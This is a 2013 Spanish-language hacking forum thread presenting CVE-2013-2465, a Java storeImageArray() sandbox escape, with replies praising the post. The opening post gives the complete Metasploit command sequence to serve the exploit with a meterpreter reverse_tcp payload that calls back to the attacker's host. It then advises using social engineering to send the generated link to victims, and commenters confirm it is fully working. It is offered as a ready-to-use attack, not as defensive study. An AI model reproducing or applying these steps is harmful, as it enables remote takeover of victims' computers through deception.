CVE-2013-2465

Iniciado por Stuxnet, Agosto 23, 2013, 01:57:06 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Agosto 23, 2013, 01:57:06 AM Ultima modificación: Agosto 23, 2013, 02:23:46 AM por Stuxnet

CVE-2013-2465 - Java storeImageArray() Invalid Array Indexing

Este módulo de Metasploit abusa de la vulneravilidad matriz indexación no válida en la función storeImageArray() de la función estática para producir una corrupción de memoria y finalmente evadir el Sandbox de Java. La vulnerabilidad afecta a Java versión 7u21 y versiones anteriores.


Explotando CVE-2013-2465 con mestasploit:

// Cargamos el módulo
Código: php

msf > use exploit/multi/browser/java_storeimagearray

msf exploit(java_storeimagearray) > set PAYLOAD java/meterpreter/reverse_tcp

msf exploit(java_storeimagearray) > set LHOST [IP Local]

msf exploit(java_storeimagearray) > set srvhost [IP Local]

msf exploit(java_storeimagearray) > set uripath /

msf exploit(java_storeimagearray) > exploit


Ahora realizamos un poco de Ingeniería Social para enviar la dirección generada por el metasploit para hacer la sesion meterpreter.

Saludos, \0/
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Que excelente aporte Stuxnet, no lo conocía, ya has tenido la oportunidad de usarlo?
No intentes pararme, trata de defenderte, trata de matarme, pero de cualqueir forma TE SUPERARE

Habrá q probarlo! Gracias!!

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Que excelente aporte Stuxnet, no lo conocía, ya has tenido la oportunidad de usarlo?

Si, de ahi fue donde cree el tutorial. Siempre lo testeo antes de publicarlo.

Saludos...
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Que excelente aporte Stuxnet, no lo conocía, ya has tenido la oportunidad de usarlo?

Si, de ahi fue donde cree el tutorial. Siempre lo testeo antes de publicarlo.

Saludos...

Siempre traduces  xDDD

PD: Es totalmente funcional :)

Regards,
Snifer
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



Nicee!!
Para el blog!

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Muchas gracias Stuxnet! muy buen aporte!


@Snifer yo se que me amas; xD si tradusco la descripción mejor enséñame ingles xD

Saludos.
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta